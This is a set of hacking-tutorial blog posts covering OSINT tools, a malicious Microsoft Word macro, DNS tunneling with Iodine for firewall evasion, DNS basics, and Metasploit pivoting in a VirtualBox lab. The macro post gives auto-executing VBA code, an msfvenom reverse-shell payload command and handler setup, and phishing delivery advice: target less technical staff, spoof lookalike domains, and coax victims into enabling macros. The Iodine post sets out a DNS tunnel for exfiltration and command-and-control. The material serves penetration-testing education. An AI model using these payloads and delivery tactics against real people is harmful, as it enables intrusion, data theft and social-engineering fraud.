OSINT

Hello world, welcome to haxez where I want to talk about OSINT or Open-source intelligence and passive reconnaissance. Passive Reconnaissance is one of the most important phases for successful hacking. Passive Reconnaissance uses Open Source Intelligence (OSINT) techniques to gather information about the target. To explain, we attempt to gather information about the target without interacting with it. For this reason, this article is going to cover a number of Passive Reconnaissance tools but there are plenty more out there.

Google Passive Reconnaissance

Google is an extremely powerful search engine. They didn’t become the number one search engine by luck. Usually, most people use google by popping in word and looking through the results. However, with a few modifications to your search terms, Google can be a powerful Passive Reconnaissance tool. In essence, using specific search operators can retrieve a wealth of information from google. Additionally, the Exploit Database has a whole section dedicated to “Google Dorks” which can return potentially sensitive information about a target. Below are just a few examples.

Google Passive Reconnaissance
Google Passive Reconnaissance

Maltego Passive Reconnaissance

Maltego is an open-source intelligence gathering application that allows you to gather information about a target domain. In short, it has a number of transforms that will automatically perform passive reconnaissance techniques. Furthermore, these transforms include various DNS record look-ups from various sources. Email addresses and telephone numbers and various other bits of information. Overall, the interface provides an intuitive and friendly method of viewing the information retrieved. Within a few clicks, you can have a wealth of information that could allow you to find weaknesses in your target. Simply right an entity and chose from the list of transforms.

https://www.maltego.com

Maltego Passive Reconnaissance
Maltego Passive Reconnaissance

Have I Been Pwned?

Have I been Pwned? is a web application that allows you to check whether the credentials of a mailbox have been compromised. Notably, It utilizes known database leaks and checks whether your email address was part of those leaks. These leaks are from various sources including public leaks such as the Linked In database leak. Have I Been Pwned? was created for you to check your own email address but there is nothing stopping you from checking other peoples too.

https://haveibeenpwned.com

Have I Been Pwned? Passive Reconnaissance
Have I Been Pwned? Passive Reconnaissance

MXToolbox OSINT

MXToolBox is a web application that has a great number of tools. I initially discovered this tool while working in Technical Support for a hosting provider. It can be used to gather information about a domain’s DNS records. Furthermore, it has tools like ping so if you want to see whether an IP is blocking you, you can check on here rather than switching VPN locations. To cover all the tools would require an entire article but this is a great tool to perform passive reconnaissance against a target.

https://mxtoolbox.com

MXToolbox Passive Reconnaissance
MXToolbox Passive Reconnaissance

Shodan OSINT

Shodan is a search engine for internet-connected devices. It can be used to find specific devices with specific operating systems with specific ports open. It has also indexed the various banners that those ports display when connecting to them. Furthermore, it also checks to see whether those devices are using weak credentials. You can filter devices by country, city, organization, and domain, the list of flags is endless. If you wanted to find all FTP servers owned by a certain organization that supports anonymous login then you can.

HaXeZ_Shodan_Cheat_SheetDownload

https://www.shodan.io

Shodan Passive Reconnaissance
Shodan Passive Reconnaissance

OSINT Framework

The OSINT Framework is a web application that catalogs everything you could want to know about Open Source Intelligence Gathering. It has a horizontal hierarchical structure and clicking one category will provide other categories and eventually a link to a resource. The resource will usually provide instructions or a tool for you to perform that specific type of OSINT. This web application has a lot to explore, more than can be covered in a single article.

https://osintframework.com

OSINT Framework
OSINT Framework

Whois

The Whois is a tool that can gather information about the registration of a domain. In some cases, it may tell you who registered it and include their contact details but this will depend on the domain privacy settings. This information could include the domain owners’ telephone number as well as their addresses. Furthermore, the owner information, domain registration date, and expiry date can also be provided by the tool.

whois google.com
Whois
Whois

NSlookup

You can use the nslookup tool to retrieve information about a domain. The information can include the domains name servers, the IP address, the mail servers, and various other records. It can tell you how the domain is configured, provide certain records, and may identify potential targets.

OSINT NSlookup
NSlookup

theHarvester

A tool that combines all of these techniques into one great command-line tool is the Harvester. The Harvester is a wrapper for other tools and can perform passive and active reconnaissance. It can use search engines to find subdomains and URLs. Additionally, It can use social media websites to find employee names and email addresses. To find the full list of tools utilized by theHarvester, head over to the developer’s GitHub page.

https://github.com/laramies/theHarvester

OSINT theHarvester
theHarvester

OSINT Conclusion

Passive reconnaissance can provide a wealth of information about a target that you are testing. While some of the information may be beyond the scope of the engagement, it can give you a good insight into their organization. The tools I’ve talked about above barely scrape the surface of the iceberg that is OSINT tools. Perhaps one day someone will create an and all in one, web-based OSINT scanner and it will become what Nessus is to vulnerability scans. I’m fond of Maltego and theHarvester and think they do a fantastic job but would love more functionality and a simpler interface. Input your domain, tick the boxes of what information you want to discover and then wait for the report.

Making A Malicious Microsoft Office File

Hello world and welcome to haxez, in this post I’m going to be explaining how you can create a malicious Microsoft Office file to hack anyone. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.

Malicious File With Microsoft Office Visual Basic

Microsoft Office applications have a feature that allows them to support Visual Basic programs or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the view tab and click on Macros, then view Macros.

Malicious File Microsoft Office Visual Basic
Microsoft Office Visual Basic

Creating A Malicious File Macro In Microsoft Office

With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.

Creating A Malicious File Macro In Microsoft Office
Creating A Macro In Microsoft Office

A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.

Sub THM()
MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Macro In Microsoft Office Malicious File
Macro In Microsoft Office

Running the Microsoft Office Malicious File Macro

Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.

Running the Microsoft Office Malicious File Macro
Running the Microsoft Office Macro

Automatic Macro Execution (sort of)

We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and Auto_Open functions. You also need to specify which function to execute, in our case it is the EvilMacro function. The code will look similar to the snippet below.

Sub Document_Open()
EvilMacro
End SubSub AutoOpen()
EvilMacro
End SubSub EvilMacro()
MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Automatic Macro Execution (sort of)
Automatic Macro Execution (sort of)

In order for the macro to work, it needs to be saved in a Macro-Enabled format such as .doc and docm. To do this, save the document as a Word 97–2003 Template. Got to File, save Document1 and save as type Word 97–2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.

Popping Programs with Microsoft Office Malicious File

That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.

Sub Document_Open()
EvilMacro
End SubSub AutoOpen()
EvilMacro
End SubSub EvilMacro()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
Popping Programs with Microsoft Office
Popping Programs with Microsoft Office

Injecting Some Venom

With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.

Firstly, we need to create a Macro payload to add to our Microsoft Word Document, this can be done using the following msfvenom command and replacing the X’s with your attack boxes IP address and desired port:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X -f vba

Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97–2003 Document.

Injecting Some Venom
Injecting Some Venom

Catching The Reverse Shell

The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.

Catching The Reverse Shell
Catching The Reverse Shell
sysinfo
sysinfo

Triggering The Payload With Malicious File

When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.

Enable content
Enable content

Microsoft Office Delivery Methods

The are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success will likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.

USB Delivery

USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.

Web Delivery

Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done but web delivery gives you more flexibility. The victim need only down the file and open it.

Email Delivery

Email delivery is a great option for a delivery technique provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For explain, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected]. Granted it stands out but there are more sneaky ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.

Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.

Conclusion

Ok, the title of this post was clickbait and for that, I apologize. Granted the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such as way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.

Firewall Evasion with DNS Tunneling

Hello World and welcome to haxez. Today I want to talk about the DNS tunneling software Iodine. Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

Pre Iodined What Is My IP DNS
Pre Iodined What Is My IP

Iodine DNS Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine Domain Name DNS Configuration
Iodine Domain Name DNS Configuration

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
DNS Iodine Server Configuration
Iodine Server Configuration

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Iodine DNS Server Check
Iodine Server Check

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one.

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Configuration
Iodine Client Configuration

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP looking at DNS
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected]

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Setting Up Browser SOCKS Proxy
Setting Up Browser SOCKS Proxy
Iodined What Is My IP
Iodined What Is My IP

DNS Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

DNS Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

DNS Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

DNS Simplified

Hello world, and welcome to haxez. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What is DNS?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using various tools. The example below is using Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

DNS is a hierarchical system
DNS is a hierarchical system

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, www.haxez.org where www is the subdomain, and haxez is the fully qualified domain.

Domain Structure
Domain Structure

How Does The DNS Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name,
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
  3. The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
  4. The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain,
  8. The DNS resolver responds back to the client with the IP address of the domain,
  9. The client then sends the request to the target IP address,
  10. The target IP address would then respond with the information the client requested.
How DNS Works
How DNS Works

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[joe@Parrot]─[~]
└──╼ $nslookup
> set type=ns
> .
Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
. nameserver = c.root-servers.net.
. nameserver = d.root-servers.net.
. nameserver = e.root-servers.net.
. nameserver = f.root-servers.net.
. nameserver = g.root-servers.net.
. nameserver = h.root-servers.net.
. nameserver = i.root-servers.net.
. nameserver = j.root-servers.net.
. nameserver = k.root-servers.net.
. nameserver = l.root-servers.net.
. nameserver = m.root-servers.net.
. nameserver = a.root-servers.net.
. nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net

Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
Name: a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.

;; Truncated, retrying in TCP mode.
Server: 198.41.0.4
Address: 198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com nameserver = e.gtld-servers.net.
com nameserver = b.gtld-servers.net.
com nameserver = j.gtld-servers.net.
com nameserver = m.gtld-servers.net.
com nameserver = i.gtld-servers.net.
com nameserver = f.gtld-servers.net.
com nameserver = a.gtld-servers.net.
com nameserver = g.gtld-servers.net.
com nameserver = h.gtld-servers.net.
com nameserver = l.gtld-servers.net.
com nameserver = k.gtld-servers.net.
com nameserver = c.gtld-servers.net.
com nameserver = d.gtld-servers.net.
e.gtld-servers.net internet address = 192.12.94.30
e.gtld-servers.net has AAAA address 2001:502:1ca1::30
b.gtld-servers.net internet address = 192.33.14.30
b.gtld-servers.net has AAAA address 2001:503:231d::2:30
j.gtld-servers.net internet address = 192.48.79.30
j.gtld-servers.net has AAAA address 2001:502:7094::30
m.gtld-servers.net internet address = 192.55.83.30
m.gtld-servers.net has AAAA address 2001:501:b1f9::30
i.gtld-servers.net internet address = 192.43.172.30
i.gtld-servers.net has AAAA address 2001:503:39c1::30
f.gtld-servers.net internet address = 192.35.51.30
f.gtld-servers.net has AAAA address 2001:503:d414::30
a.gtld-servers.net internet address = 192.5.6.30
a.gtld-servers.net has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net internet address = 192.42.93.30
g.gtld-servers.net has AAAA address 2001:503:eea3::30
h.gtld-servers.net internet address = 192.54.112.30
h.gtld-servers.net has AAAA address 2001:502:8cc::30
l.gtld-servers.net internet address = 192.41.162.30
l.gtld-servers.net has AAAA address 2001:500:d937::30
k.gtld-servers.net internet address = 192.52.178.30
k.gtld-servers.net has AAAA address 2001:503:d2d::30
c.gtld-servers.net internet address = 192.26.92.30
c.gtld-servers.net has AAAA address 2001:503:83eb::30
d.gtld-servers.net internet address = 192.31.80.30
d.gtld-servers.net has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server: 192.5.6.30
Address: 192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com nameserver = ns2.google.com.
google.com nameserver = ns1.google.com.
google.com nameserver = ns3.google.com.
google.com nameserver = ns4.google.com.
ns2.google.com has AAAA address 2001:4860:4802:34::a
ns2.google.com internet address = 216.239.34.10
ns1.google.com has AAAA address 2001:4860:4802:32::a
ns1.google.com internet address = 216.239.32.10
ns3.google.com has AAAA address 2001:4860:4802:36::a
ns3.google.com internet address = 216.239.36.10
ns4.google.com has AAAA address 2001:4860:4802:38::a
ns4.google.com internet address = 216.239.38.10

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server: 216.239.32.10
Address: 216.239.32.10#53
Name: mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Metasploit Pivoting To Hack Segregated Machines

Hello world, welcome to haxez. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting
Pivoting

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a setup fee in order to access them. Then I had a light bulb moment. I’ve googled around and I haven’t seen many articles relating to using VirtualBox. VirtualBox has a number of network adaptor settings. One of these settings is a Host Only adapter. You can have multiple Virtual Machines configured to use this host-only adapter. You can also create multiple host-only adapters. My idea (I’m sure many others have had it) was to set up a lab in the following configuration.

  • Kali VM on the host only adapter 1.
  • Vulnerable VM 1 on the host only adapters 1 and 2.
  • Vulnerable VM 2 on the host only adapter 2.

The Kali VM wouldn’t be able to reach Vulnerable VM 2 unless it has exploited and is pivoting through Vulnerable VM 1.

Lab Set Up

Let’s get to work, first I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting — Clone Virtual Machine
Pivoting — Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting — Creating New Host-Only Adapter
Pivoting — Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Network Configuration
Host Network Configuration

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In its current condition, it won’t be able to talk to the second network and thus the second target. To rectify this, I had a quick google search and found this page in the Ubuntu documentation. The configuring interface section explains how to bring up an interface using DHCP.

sudo ip link set dev eth1 down
sudo dhclient eth1
Interface eth1 Configured
Interface eth1 Configured

Testing Pivoting

Now for the moment of truth, does this allow me to pivot from Meta1 to Meta2. First, we need to find the IP address of the host on the same network as us. You can do this by running ifconfig on the host or the proper way by performing a Nmap scan. Great, our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy set up of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no
BRUTEFORCE_SPEED 5 yes
DB_ALL_CREDS false no
DB_ALL_PASS false no
DB_ALL_USERS false no
DB_SKIP_EXISTING none no
PASSWORD msfadmin no
PASS_FILE no
RHOSTS 192.168.56.106 yes
RPORT 22 yes
STOP_ON_SUCCESS false yes
THREADS 1 yes
USERNAME msfadmin no
USERPASS_FILE no
USER_AS_PASS false no
USER_FILE no
VERBOSE false yes

I then ran the exploit command and waited for it to complete. Great, we have established a connection to our host but now we need to upgrade it to a Meterpreter shell. In order to do this, I first figured out what session it was using the session command.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
3 shell linux SSH root @ 192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...meterpreter > ifconfigInterface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:82:70:32
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes
NETMASK 255.255.255.0 no
SESSION 4 yes
SUBNET no

I then ran the module and it create the pivot for me.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it but where is the fun in that. I switched to the ping_sweep module and configured it to use session 4. I then configured the IP address of the remote network and ran the module.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.242.0/24 yes
SESSION 4 yes
